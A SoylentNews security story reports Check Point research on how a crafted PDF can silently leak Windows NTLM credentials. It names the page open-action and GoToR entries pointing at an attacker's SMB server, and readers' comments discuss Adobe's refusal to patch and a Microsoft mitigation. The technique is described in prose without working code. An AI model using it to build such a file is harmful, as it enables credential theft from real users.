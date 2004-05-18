Stories
Slash Boxes
Comments

SoylentNews is people

PDF Files Can Silently Leak NTLM Credentials

posted by janrinok on Saturday May 05, @01:51AM   Printer-friendly
from the not-the-best-best-explanation dept.
Security

MrPlow writes:

Submitted via IRC for SoyCow8317

NT LAN Manager (NTLM) credentials can be stolen via malicious Portable Document Format (PDF) files without user interaction.

PDF files, the security researchers explain, consist primarily of objects, together with Document structure, File structure, and content streams. There are eight basic types of objects, including dictionaries, and a malicious actor can abuse these to steal NTLM credentials.

A dictionary object represents a table containing pairs of objects, called entries, where the first element is the key (a name) and the second element is the value (may be any kind of object). Represented by dictionary objects, the pages of a document are called page objects and consist of required and optional entries.

One of the optional entries is the /AA entry, defining actions performed when a page is opened (/O entry) or closed (/C entry). An action dictionary is held within /O (/C) and consists of 3 required entries: /S, /F, and /D, describing the type of action to be performed – GoToR (Go To Remote) and GoToE (Go To Embedded) –, the location location [sic] of the other PDF, and the location to go to within the document.

"By injecting a malicious entry (using the fields described above together with his SMB server details via the '/F' key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details," Check Point explains.

Source: https://www.securityweek.com/pdf-files-can-silently-leak-ntlm-credentials

Original Submission


«  Saturday, 5 May 2018: Free Comic Book Day
PDF Files Can Silently Leak NTLM Credentials | Log In/Create an Account | Top | 2 comments | Search Discussion
Display Options Threshold/Breakthrough Reply to Article Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
(1)

  • (Score: 1, Insightful) by Anonymous Coward on Saturday May 05, @02:13AM (1 child)

    by Anonymous Coward on Saturday May 05, @02:13AM (#675944)

    According to Check Point, the issue likely impacts all PDF-viewers for Windows, as all of them will reveal the NTLM credentials.

    Not surprising that it is Windows, but it's a bit surprising that all PDF viewers reveal the NTLM credentials. TFA doesn't say whether browsers that display PDFs have the same vulnerability.

    The security researchers informed Adobe on the vulnerability, but the company said a fix won’t be released, because Microsoft is already offering users the possibility to prevent such attacks from happening in the first place.

    Thanks (for nothing) Adobe. How is Microsoft already offering to prevent these attacks? Is that for all versions of Windows? If it is, then why is this even considered an issue? Something doesn't smell right.

    • (Score: 1, Insightful) by Anonymous Coward on Saturday May 05, @02:22AM

      by Anonymous Coward on Saturday May 05, @02:22AM (#675947)

      Found this MS security article [microsoft.com] stating (emphasis mine):

      Microsoft is releasing an optional security enhancement to NT LAN Manager (NTLM), limiting which network resources various clients in the Windows 10 or the Windows Server 2016 operating systems can use NTLM Single Sign On(SSO) as an authentication method. When you deploy the new security enhancement with a Network Isolation Policy defining your organization's resources, attackers can no longer redirect a user to a malicious resource outside your organization to obtain the NTLM authentication messages. This new behavior is optional, and requires customers who wish to enable it to opt in via a Windows Registry Setting or other means described below.

      So Adobe is leaving this security vulnerability in place because of an obscure MS option to prevent it.

(1)